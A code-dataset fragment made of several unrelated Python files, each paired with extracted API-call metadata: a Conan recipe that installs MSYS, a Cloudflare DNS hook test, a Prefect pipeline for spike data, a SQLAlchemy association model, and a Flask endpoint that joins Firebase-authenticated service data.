PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15531, 15563), 'chess.const.Piece', 'Piece', (['PieceType.Queen', 'o_colour'], {}), '(PieceType.Queen, o_colour)\n', (15536, 15563), False, 
'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15581, 15612), 'chess.const.Piece', 'Piece', (['PieceType.King', 'o_colour'], {}), '(PieceType.King, o_colour)\n', (15586, 15612), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((24726, 24748), 'chess.utils.load_image', 'load_image', (['sprite_img'], {}), '(sprite_img)\n', (24736, 24748), False, 'from chess.utils import load_image, load_font\n'), ((12271, 12331), 'chess.const.Piece', 'Piece', (['move.Flags.PawnPromotion', 'self._board[move.To].Colour'], {}), '(move.Flags.PawnPromotion, self._board[move.To].Colour)\n', (12276, 12331), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((13409, 13461), 'chess.const.Piece', 'Piece', (['PieceType.Pawn', 'self._board[move.From].Colour'], {}), '(PieceType.Pawn, self._board[move.From].Colour)\n', (13414, 13461), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((20155, 20180), 'math.copysign', 'math.copysign', (['(1)', '(x2 - x1)'], {}), '(1, x2 - x1)\n', (20168, 20180), False, 'import math\n'), ((20203, 20228), 'math.copysign', 'math.copysign', (['(1)', '(y2 - y1)'], {}), '(1, y2 - y1)\n', (20216, 20228), False, 'import math\n'), ((20621, 20646), 'math.copysign', 'math.copysign', (['(1)', '(x2 - x1)'], {}), '(1, x2 - x1)\n', (20634, 20646), False, 'import math\n'), ((20968, 20993), 'math.copysign', 'math.copysign', (['(1)', '(y2 - y1)'], {}), '(1, y2 - y1)\n', (20981, 20993), False, 'import math\n'), ((22326, 22343), 'chess.const.Piece', 'Piece', (['type_', 'clr'], {}), '(type_, clr)\n', (22331, 22343), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, 
GameState\n'), ((4318, 4423), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'self._move_colour', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, self._move_colour, (x * self._side, y * self._side,\n self._side, self._side))\n', (4334, 4423), False, 'import pygame\n'), ((8664, 8677), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (8675, 8677), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9709, 9765), 'chess.const.MoveFlags', 'MoveFlags', ([], {'Castling': 'castling', 'LoseCastling': 'lost_castling'}), '(Castling=castling, LoseCastling=lost_castling)\n', (9718, 9765), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10287, 10324), 'chess.const.MoveFlags', 'MoveFlags', ([], {'LoseCastling': 'lost_castling'}), '(LoseCastling=lost_castling)\n', (10296, 10324), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((12616, 12629), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (12627, 12629), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((12761, 12774), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (12772, 12774), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((13752, 13765), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (13763, 13765), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((13899, 13912), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (13910, 13912), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, 
Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((14662, 14684), 'chess.const.Move', 'Move', (['pos', 'i', 'piece_to'], {}), '(pos, i, piece_to)\n', (14666, 14684), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((17840, 17871), 'numpy.where', 'np.where', (['(self._board == o_king)'], {}), '(self._board == o_king)\n', (17848, 17871), True, 'import numpy as np\n'), ((526, 539), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (537, 539), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((4567, 4680), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'self._light_complementary', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, self._light_complementary, (x * self._side, y *\n self._side, self._side, self._side))\n', (4583, 4680), False, 'import pygame\n'), ((14309, 14329), 'chess.const.Move', 'Move', (['i', 'j', 'piece_to'], {}), '(i, j, piece_to)\n', (14313, 14329), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((4840, 4952), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'self._dark_complementary', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, self._dark_complementary, (x * self._side, y *\n self._side, self._side, self._side))\n', (4856, 4952), False, 'import pygame\n'), ((5204, 5299), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'colour', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, colour, (x * self._side, y * self._side, self.\n _side, self._side))\n', (5220, 5299), False, 'import pygame\n'), ((8890, 8903), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (8901, 8903), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, 
PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((8957, 8970), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (8968, 8970), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9024, 9037), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (9035, 9037), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10548, 10596), 'chess.const.MoveFlags', 'MoveFlags', ([], {'LoseCastling': '{CastlingType.QueenSide}'}), '(LoseCastling={CastlingType.QueenSide})\n', (10557, 10596), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10863, 10903), 'chess.const.MoveFlags', 'MoveFlags', ([], {'PawnPromotion': 'PieceType.Queen'}), '(PawnPromotion=PieceType.Queen)\n', (10872, 10903), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((14938, 14967), 'chess.const.Piece', 'Piece', (['PieceType.King', 'colour'], {}), '(PieceType.King, colour)\n', (14943, 14967), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9175, 9188), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (9186, 9188), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9242, 9255), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (9253, 9255), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10720, 10767), 'chess.const.MoveFlags', 'MoveFlags', ([], {'LoseCastling': '{CastlingType.KingSide}'}), '(LoseCastling={CastlingType.KingSide})\n', (10729, 10767), False, 
'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n')] |
from conans import ConanFile, tools
import os
class MsysBaseInstallerConan(ConanFile):
    """Conan installer package for the MSYS base utilities.

    Downloads the individual msys-1.0 component archives from SourceForge,
    unpacks them with 7z, and packages the resulting tree, exposing its
    ``bin`` directory on the PATH of consuming packages.
    """
    name = "msys-base_installer"
    version = "2013072300"
    license = "http://www.mingw.org/license"
    url = "http://github.com/danimtb/conan-msys-installer"
    settings = "os", "compiler"
    build_policy = "missing"
    description = "Msys"
    build_requires = "7z_installer/1.0@conan/stable"

    def configure(self):
        """Reject any configuration other than Windows with gcc.

        MSYS binaries only run on Windows with the MinGW/gcc toolchain.
        The previous check joined the two conditions with ``and``, which
        silently accepted invalid combinations such as Linux/gcc or
        Windows/msvc; either mismatch must raise.
        """
        if self.settings.os != "Windows" or self.settings.compiler != "gcc":
            raise Exception("Not valid configuration: %s, %s. %s should be used in Windows, gcc" % (self.settings.os, self.settings.compiler, self.name))

    def build(self):
        """Download every MSYS component archive and extract it in place.

        Each download is a compressed tarball; the first ``7z x`` strips
        the xz/lzma layer (producing ``<name>~``), the second unpacks the
        inner tar, after which both temporary files are removed.
        """
        files = {
            "msys-bash": "http://prdownloads.sourceforge.net/mingw/bash-3.1.23-1-msys-1.0.18-bin.tar.xz",
            "msys-bzip2": "http://prdownloads.sourceforge.net/mingw/bzip2-1.0.6-1-msys-1.0.17-bin.tar.lzma",
            "msys-bzip2-dll": "http://prdownloads.sourceforge.net/mingw/libbz2-1.0.6-1-msys-1.0.17-dll-1.tar.lzma",
            "msys-core": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-bin.tar.xz",
            "msys-core-ext": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-ext.tar.xz",
            "msys-core-lic": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-lic.tar.xz",
            "msys-core-doc": "http://prdownloads.sourceforge.net/mingw/msysCORE-1.0.19-1-msys-1.0.19-doc.tar.xz",
            "msys-coreutils": "http://prdownloads.sourceforge.net/mingw/coreutils-5.97-3-msys-1.0.13-bin.tar.lzma",
            "msys-diffutils": "http://prdownloads.sourceforge.net/mingw/diffutils-2.8.7.20071206cvs-3-msys-1.0.13-bin.tar.lzma",
            "msys-dos2unix": "http://prdownloads.sourceforge.net/mingw/dos2unix-7.3.2-1-msys-1.0.18-bin.tar.lzma",
            "msys-file": "http://prdownloads.sourceforge.net/mingw/file-5.04-1-msys-1.0.13-bin.tar.lzma",
            "msys-magic-dll": "http://prdownloads.sourceforge.net/mingw/libmagic-5.04-1-msys-1.0.13-dll-1.tar.lzma",
            "msys-findutils": "http://prdownloads.sourceforge.net/mingw/findutils-4.4.2-2-msys-1.0.13-bin.tar.lzma",
            "msys-gawk": "http://prdownloads.sourceforge.net/mingw/gawk-3.1.7-2-msys-1.0.13-bin.tar.lzma",
            "msys-grep": "http://prdownloads.sourceforge.net/mingw/grep-2.5.4-2-msys-1.0.13-bin.tar.lzma",
            "msys-gzip": "http://prdownloads.sourceforge.net/mingw/gzip-1.3.12-2-msys-1.0.13-bin.tar.lzma",
            "msys-less": "http://prdownloads.sourceforge.net/mingw/less-436-2-msys-1.0.13-bin.tar.lzma",
            "msys-libiconv": "http://prdownloads.sourceforge.net/mingw/libiconv-1.14-1-msys-1.0.17-dll-2.tar.lzma",
            "msys-libintl": "http://prdownloads.sourceforge.net/mingw/libintl-0.18.1.1-1-msys-1.0.17-dll-8.tar.lzma",
            "msys-make": "http://prdownloads.sourceforge.net/mingw/make-3.81-3-msys-1.0.13-bin.tar.lzma",
            "msys-regex-dll": "http://prdownloads.sourceforge.net/mingw/libregex-1.20090805-2-msys-1.0.13-dll-1.tar.lzma",
            "msys-sed": "http://prdownloads.sourceforge.net/mingw/sed-4.2.1-2-msys-1.0.13-bin.tar.lzma",
            "msys-tar": "http://prdownloads.sourceforge.net/mingw/tar-1.23-1-msys-1.0.13-bin.tar.lzma",
            "msys-termcap": "http://prdownloads.sourceforge.net/mingw/termcap-0.20050421_1-2-msys-1.0.13-bin.tar.lzma",
            "msys-termcap-dll": "http://prdownloads.sourceforge.net/mingw/libtermcap-0.20050421_1-2-msys-1.0.13-dll-0.tar.lzma",
            "msys-texinfo": "http://prdownloads.sourceforge.net/mingw/texinfo-4.13a-2-msys-1.0.13-bin.tar.lzma",
            "msys-xz": "http://prdownloads.sourceforge.net/mingw/xz-5.0.3-1-msys-1.0.17-bin.tar.lzma",
            "msys-lzma-dll": "http://prdownloads.sourceforge.net/mingw/liblzma-5.0.3-1-msys-1.0.17-dll-5.tar.lzma",
            "msys-z-dll": "http://prdownloads.sourceforge.net/mingw/zlib-1.2.7-1-msys-1.0.17-dll.tar.lzma"
        }
        for util_name, util_url in files.items():
            tools.download(util_url, util_name)
            self.run("7z x %s" % util_name)
            self.run("7z x %s~" % util_name)
            os.unlink(util_name)
            os.unlink("%s~" % util_name)

    def package(self):
        """Package everything extracted in the build folder."""
        self.copy("*", dst="", src=".")

    def package_info(self):
        """Expose the packaged ``bin`` directory on consumers' PATH."""
        self.env_info.path.append(os.path.join(self.package_folder, "bin"))
| [
"os.path.join",
"conans.tools.download",
"os.unlink"
] | [((4018, 4061), 'conans.tools.download', 'tools.download', (['files[util_name]', 'util_name'], {}), '(files[util_name], util_name)\n', (4032, 4061), False, 'from conans import ConanFile, tools\n'), ((4163, 4183), 'os.unlink', 'os.unlink', (['util_name'], {}), '(util_name)\n', (4172, 4183), False, 'import os\n'), ((4196, 4224), 'os.unlink', 'os.unlink', (["('%s~' % util_name)"], {}), "('%s~' % util_name)\n", (4205, 4224), False, 'import os\n'), ((4356, 4396), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""'], {}), "(self.package_folder, 'bin')\n", (4368, 4396), False, 'import os\n')] |
"""Tests for 'cloudflare-gh-pages-dns' hook."""
import contextlib
import io
import os
import pytest
from hooks.cf_gh_pages_dns_records import check_cloudflare_gh_pages_dns_records
# Integration test: talks to the real Cloudflare API, so it only runs when a
# user API key is available in the environment.
@pytest.mark.skipif(
    not os.environ.get("CF_API_KEY"),
    reason=(
        "Cloudflare user API key defined in 'CF_API_KEY' environment variable"
        " needed."
    ),
)
@pytest.mark.parametrize("quiet", (True, False), ids=("quiet=True", "quiet=False"))
@pytest.mark.parametrize(
    ("domain", "username", "expected_result", "expected_stderr"),
    (
        pytest.param(
            "hrcgen.ml",
            "mondeja",
            True,
            "",
            id="domain=hrcgen.ml-username=mondeja",  # configured with GH pages
        ),
        pytest.param(
            "foobar.baz",
            "mondeja",
            False,
            (
                "The domain 'foobar.baz' was not found being managed by your"
                " Cloudflare account.\n"
            ),
            id="domain=foobar.baz-username=mondeja",  # inexistent zone
        ),
        # TODO: add example domain to test bad configuration
    ),
)
def test_check_cloudflare_gh_pages_dns_records(
    domain,
    username,
    expected_result,
    expected_stderr,
    quiet,
):
    """Check that DNS-record validation returns the expected boolean and
    writes exactly the expected diagnostic text to stderr, for both quiet
    modes."""
    # Capture everything the hook writes to stderr during the check.
    stderr = io.StringIO()
    with contextlib.redirect_stderr(stderr):
        result = check_cloudflare_gh_pages_dns_records(
            domain,
            username,
            quiet=quiet,
        )
    assert result is expected_result
    assert stderr.getvalue() == expected_stderr
| [
"os.environ.get",
"pytest.param",
"pytest.mark.parametrize",
"contextlib.redirect_stderr",
"io.StringIO",
"hooks.cf_gh_pages_dns_records.check_cloudflare_gh_pages_dns_records"
] | [((365, 451), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""quiet"""', '(True, False)'], {'ids': "('quiet=True', 'quiet=False')"}), "('quiet', (True, False), ids=('quiet=True',\n 'quiet=False'))\n", (388, 451), False, 'import pytest\n'), ((1275, 1288), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (1286, 1288), False, 'import io\n'), ((1299, 1333), 'contextlib.redirect_stderr', 'contextlib.redirect_stderr', (['stderr'], {}), '(stderr)\n', (1325, 1333), False, 'import contextlib\n'), ((1352, 1420), 'hooks.cf_gh_pages_dns_records.check_cloudflare_gh_pages_dns_records', 'check_cloudflare_gh_pages_dns_records', (['domain', 'username'], {'quiet': 'quiet'}), '(domain, username, quiet=quiet)\n', (1389, 1420), False, 'from hooks.cf_gh_pages_dns_records import check_cloudflare_gh_pages_dns_records\n'), ((214, 242), 'os.environ.get', 'os.environ.get', (['"""CF_API_KEY"""'], {}), "('CF_API_KEY')\n", (228, 242), False, 'import os\n'), ((554, 645), 'pytest.param', 'pytest.param', (['"""hrcgen.ml"""', '"""mondeja"""', '(True)', '""""""'], {'id': '"""domain=hrcgen.ml-username=mondeja"""'}), "('hrcgen.ml', 'mondeja', True, '', id=\n 'domain=hrcgen.ml-username=mondeja')\n", (566, 645), False, 'import pytest\n'), ((749, 931), 'pytest.param', 'pytest.param', (['"""foobar.baz"""', '"""mondeja"""', '(False)', '"""The domain \'foobar.baz\' was not found being managed by your Cloudflare account.\n"""'], {'id': '"""domain=foobar.baz-username=mondeja"""'}), '(\'foobar.baz\', \'mondeja\', False,\n """The domain \'foobar.baz\' was not found being managed by your Cloudflare account.\n"""\n , id=\'domain=foobar.baz-username=mondeja\')\n', (761, 931), False, 'import pytest\n')] |
import os
# NOTE: these environment variables must be assigned before prefect and the
# django-backed modules below are imported, which is why the assignments sit
# between the import statements.
os.environ['PREFECT__LOGGING__LEVEL'] = 'DEBUG'
os.environ['DJANGO_ALLOW_ASYNC_UNSAFE'] = 'true'
from prefect import flow, task
import numpy as np
import pandas as pd
from django_pandas.io import read_frame
import helpers
@task
def insert_session(session_id):
    """Replace the stored stimulus presentations for one session.

    Deletes any existing StimulusPresentation rows for ``session_id`` and
    re-inserts them from the AllenSDK session's stimulus table, attaching
    each row's stimulus_type_id by joining on the stimulus name.
    """
    from django_connect import connect
    connect()
    import db.models as d
    session = helpers.get_session(session_id)
    # Remove any previously inserted rows so the insert below is a clean
    # replacement rather than an append.
    d.StimulusPresentation.objects.filter(session_id=session_id).delete()
    # stimulus types
    stim_types = read_frame(d.StimulusType.objects.all())
    # stimulus presentations
    stim_table = session.stimulus_presentations
    stim_table = stim_table.replace({'null':None})
    # Normalise these columns via helpers.clean_string — presumably they
    # arrive as stringified values; confirm against helpers.
    for k in ['phase','size','spatial_frequency']:
        stim_table[k] = stim_table[k].apply(helpers.clean_string)
    stim_table = stim_table.reset_index()
    # Join on stimulus name to pick up the StimulusType primary key, then
    # rename it to the FK column and drop the join helper columns.
    stim_table = stim_table.merge(stim_types.reset_index(), left_on='stimulus_name', right_on='name', how='left')
    stim_table = stim_table.rename(columns={'id':'stimulus_type_id'}).drop(columns=['stimulus_name','name','index'])
    stim_table['session_id'] = pd.Series([session.ecephys_session_id]*len(stim_table))
    # Map NaN to None so the ORM writes SQL NULLs instead of NaN.
    stim_table = stim_table.fillna(np.nan).replace({np.nan:None})
    d.StimulusPresentation.objects.bulk_create([ d.StimulusPresentation(**v) for v in stim_table.to_dict(orient='records')])
@task
def list_units(session_id):
    """Return the ids of every unit recorded in the given session."""
    from django_connect import connect
    connect()
    import db.models as d
    unit_rows = d.Unit.objects.filter(
        channel__session_probe__session_id=session_id)
    return [int(unit.id) for unit in unit_rows]
@task
def insert_spike_times(session_id, unit_id):
    """Replace the stored spike times for one unit.

    Deletes any existing UnitSpikeTimes row for ``unit_id``; if the
    AllenSDK session has spike times for that unit, saves a fresh row.
    """
    from django_connect import connect
    connect()
    import db.models as d
    print(f"insert_spike_times: session {session_id}, unit {unit_id}")
    # Clear any previous row.  The original code captured delete()'s return
    # value in an unused local that was later shadowed; it is not needed.
    d.UnitSpikeTimes.objects.filter(unit_id=unit_id).delete()
    session = helpers.get_session(session_id)
    if unit_id in session.spike_times:
        unit_spike_times = session.spike_times[unit_id]
        record = d.UnitSpikeTimes(unit_id=unit_id,
                         spike_times=list(unit_spike_times))
        record.save()
@task
def insert_trial_spike_counts(unit_id):
    """Replace the per-stimulus spike counts and rates for one unit.

    Counts the unit's spikes inside each stimulus presentation window of
    its session and bulk-inserts one TrialSpikeCounts row per stimulus.
    Does nothing when the unit has no stored spike times.
    """
    from django_connect import connect
    connect()
    import db.models as d
    # Clean replacement: drop any previously computed rows for this unit.
    d.TrialSpikeCounts.objects.filter(unit_id=unit_id).delete()
    unit = d.Unit.objects.get(pk=unit_id)
    session = unit.channel.session_probe.session
    stim_table = d.StimulusPresentation.objects.filter(session=session)
    stim_table = read_frame(stim_table)
    # NOTE: the original code also queried all units of the session into an
    # unused local (``unit_table``); that pointless query has been removed.
    duration = stim_table.stop_time-stim_table.start_time
    spike_times = d.UnitSpikeTimes.objects.filter(unit=unit)
    if len(spike_times) == 0:
        return
    spike_times = np.array(spike_times.first().spike_times)
    # Per-stimulus spike counts within [start_time, stop_time).
    count = helpers.spike_count(stim_table.start_time,stim_table.stop_time,spike_times)
    this_df = pd.DataFrame(data = {
        'unit_id':int(unit.id),
        'stimulus_id':stim_table.id.values.astype(int),
        'spike_count':count,
        'spike_rate':np.divide(count,duration)
    })
    d.TrialSpikeCounts.objects.bulk_create([d.TrialSpikeCounts(**v) for v in this_df.to_dict(orient='records')])
@flow(name="spikes")
def spike_flow(session_id):
    """Populate the spike-related tables for one session.

    Inserts the session's stimulus presentations first, then for every
    unit inserts its spike times followed by its per-trial spike counts.
    """
    r0 = insert_session(session_id)
    # wait_for ensures the stimulus rows exist before units are listed.
    unit_ids = list_units(session_id, wait_for=[r0])
    for unit_id in unit_ids.wait().result():
        r1 = insert_spike_times(session_id=session_id, unit_id=unit_id)
        # Counts are computed from the spike times inserted just above.
        insert_trial_spike_counts(unit_id=unit_id, wait_for=[r1])
if __name__ == "__main__":
    # Run the flow for a sample session id when executed as a script.
    spike_flow(session_id=732592105)
| [
"helpers.spike_count",
"db.models.TrialSpikeCounts",
"db.models.StimulusPresentation.objects.filter",
"prefect.flow",
"db.models.StimulusPresentation",
"db.models.UnitSpikeTimes.objects.filter",
"django_pandas.io.read_frame",
"django_connect.connect",
"helpers.get_session",
"db.models.Unit.objects... | [((3224, 3243), 'prefect.flow', 'flow', ([], {'name': '"""spikes"""'}), "(name='spikes')\n", (3228, 3243), False, 'from prefect import flow, task\n'), ((317, 326), 'django_connect.connect', 'connect', ([], {}), '()\n', (324, 326), False, 'from django_connect import connect\n'), ((368, 399), 'helpers.get_session', 'helpers.get_session', (['session_id'], {}), '(session_id)\n', (387, 399), False, 'import helpers\n'), ((1433, 1442), 'django_connect.connect', 'connect', ([], {}), '()\n', (1440, 1442), False, 'from django_connect import connect\n'), ((1482, 1550), 'db.models.Unit.objects.filter', 'd.Unit.objects.filter', ([], {'channel__session_probe__session_id': 'session_id'}), '(channel__session_probe__session_id=session_id)\n', (1503, 1550), True, 'import db.models as d\n'), ((1688, 1697), 'django_connect.connect', 'connect', ([], {}), '()\n', (1695, 1697), False, 'from django_connect import connect\n'), ((1878, 1909), 'helpers.get_session', 'helpers.get_session', (['session_id'], {}), '(session_id)\n', (1897, 1909), False, 'import helpers\n'), ((2198, 2207), 'django_connect.connect', 'connect', ([], {}), '()\n', (2205, 2207), False, 'from django_connect import connect\n'), ((2311, 2341), 'db.models.Unit.objects.get', 'd.Unit.objects.get', ([], {'pk': 'unit_id'}), '(pk=unit_id)\n', (2329, 2341), True, 'import db.models as d\n'), ((2408, 2462), 'db.models.StimulusPresentation.objects.filter', 'd.StimulusPresentation.objects.filter', ([], {'session': 'session'}), '(session=session)\n', (2445, 2462), True, 'import db.models as d\n'), ((2480, 2502), 'django_pandas.io.read_frame', 'read_frame', (['stim_table'], {}), '(stim_table)\n', (2490, 2502), False, 'from django_pandas.io import read_frame\n'), ((2521, 2583), 'db.models.Unit.objects.filter', 'd.Unit.objects.filter', ([], {'channel__session_probe__session': 'session'}), '(channel__session_probe__session=session)\n', (2542, 2583), True, 'import db.models as d\n'), ((2662, 2704), 
'db.models.UnitSpikeTimes.objects.filter', 'd.UnitSpikeTimes.objects.filter', ([], {'unit': 'unit'}), '(unit=unit)\n', (2693, 2704), True, 'import db.models as d\n'), ((2825, 2902), 'helpers.spike_count', 'helpers.spike_count', (['stim_table.start_time', 'stim_table.stop_time', 'spike_times'], {}), '(stim_table.start_time, stim_table.stop_time, spike_times)\n', (2844, 2902), False, 'import helpers\n'), ((525, 553), 'db.models.StimulusType.objects.all', 'd.StimulusType.objects.all', ([], {}), '()\n', (551, 553), True, 'import db.models as d\n'), ((405, 465), 'db.models.StimulusPresentation.objects.filter', 'd.StimulusPresentation.objects.filter', ([], {'session_id': 'session_id'}), '(session_id=session_id)\n', (442, 465), True, 'import db.models as d\n'), ((1279, 1306), 'db.models.StimulusPresentation', 'd.StimulusPresentation', ([], {}), '(**v)\n', (1301, 1306), True, 'import db.models as d\n'), ((1805, 1853), 'db.models.UnitSpikeTimes.objects.filter', 'd.UnitSpikeTimes.objects.filter', ([], {'unit_id': 'unit_id'}), '(unit_id=unit_id)\n', (1836, 1853), True, 'import db.models as d\n'), ((2239, 2289), 'db.models.TrialSpikeCounts.objects.filter', 'd.TrialSpikeCounts.objects.filter', ([], {'unit_id': 'unit_id'}), '(unit_id=unit_id)\n', (2272, 2289), True, 'import db.models as d\n'), ((3153, 3176), 'db.models.TrialSpikeCounts', 'd.TrialSpikeCounts', ([], {}), '(**v)\n', (3171, 3176), True, 'import db.models as d\n'), ((3075, 3101), 'numpy.divide', 'np.divide', (['count', 'duration'], {}), '(count, duration)\n', (3084, 3101), True, 'import numpy as np\n')] |
from sqlalchemy import Column, ForeignKey, Integer, DateTime
from sqlalchemy.orm import relationship
from ..database import Base
class Artist_album(Base):
    """Association model linking an Artist to an Album (many-to-many join table)."""

    __tablename__ = "artists_albums"

    # Surrogate primary key for the association row.
    id = Column(Integer, primary_key=True, index=True)

    # Foreign keys to the two sides of the association.
    artist_id = Column(Integer, ForeignKey("artists.id"))
    album_id = Column(Integer, ForeignKey("albums.id"))

    # Row timestamps; creation time is mandatory, update time may be unset.
    created_at = Column(DateTime, nullable=False)
    updated_at = Column(DateTime)

    # ORM navigation back to the related Artist / Album objects.
    artist = relationship("Artist", back_populates="artists_albums")
    album = relationship("Album", back_populates="artists_albums")
"sqlalchemy.orm.relationship",
"sqlalchemy.ForeignKey",
"sqlalchemy.Column"
] | [((204, 249), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)', 'index': '(True)'}), '(Integer, primary_key=True, index=True)\n', (210, 249), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((381, 413), 'sqlalchemy.Column', 'Column', (['DateTime'], {'nullable': '(False)'}), '(DateTime, nullable=False)\n', (387, 413), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((431, 447), 'sqlalchemy.Column', 'Column', (['DateTime'], {}), '(DateTime)\n', (437, 447), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((462, 517), 'sqlalchemy.orm.relationship', 'relationship', (['"""Artist"""'], {'back_populates': '"""artists_albums"""'}), "('Artist', back_populates='artists_albums')\n", (474, 517), False, 'from sqlalchemy.orm import relationship\n'), ((530, 584), 'sqlalchemy.orm.relationship', 'relationship', (['"""Album"""'], {'back_populates': '"""artists_albums"""'}), "('Album', back_populates='artists_albums')\n", (542, 584), False, 'from sqlalchemy.orm import relationship\n'), ((282, 306), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""artists.id"""'], {}), "('artists.id')\n", (292, 306), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n'), ((339, 362), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""albums.id"""'], {}), "('albums.id')\n", (349, 362), False, 'from sqlalchemy import Column, ForeignKey, Integer, DateTime\n')] |
from flask import request
from firebase_admin import auth
import requests
from join import firebase
import ast
import time
def get_join():
    """Join the caller's tags and tasks into one aggregated payload.

    Verifies the Firebase ID token from the ``authorization`` header, then
    calls the tags and tasks micro-services with the same token and merges
    both results together with the user's email address.

    Returns:
        dict: the upstream error payload if a service reported an error,
        otherwise ``{"msg", "data", "status"}`` with the joined data.
    """
    token = request.headers['authorization']
    decoded_token = auth.verify_id_token(token)
    # First linked e-mail identity of the authenticated Firebase user.
    email = decoded_token['firebase']['identities']['email'][0]
    # Timeouts keep a stalled upstream service from hanging this request.
    tags_response = requests.get('http://tags:7000/api/users/tags',
                                 headers={'authorization': token},
                                 verify=False, timeout=10)
    resp_tag = ast.literal_eval(tags_response.content.decode("UTF-8"))
    if "error" in resp_tag:
        return resp_tag
    tasks_response = requests.get('http://tasks:1000/api/users/tasks',
                                  headers={'authorization': token},
                                  verify=False, timeout=10)
    resp_tasks = ast.literal_eval(tasks_response.content.decode("UTF-8"))
    # Propagate upstream errors for tasks as well; previously only the tags
    # service was checked and an error payload crashed on indexing below.
    if "error" in resp_tasks:
        return resp_tasks
    resp = {
        # NOTE(review): "succeess" typo kept byte-for-byte for wire
        # compatibility -- fix in coordination with API consumers.
        "msg": "succeess",
        "data": [{
            "email": email,
            "tags": resp_tag["data"][0]["tags"][0],
            "tasks": resp_tasks["data"][0]["tasks"][0]
        }],
        "status": "200"
    }
    return resp
| [
"ast.literal_eval",
"firebase_admin.auth.verify_id_token",
"requests.get"
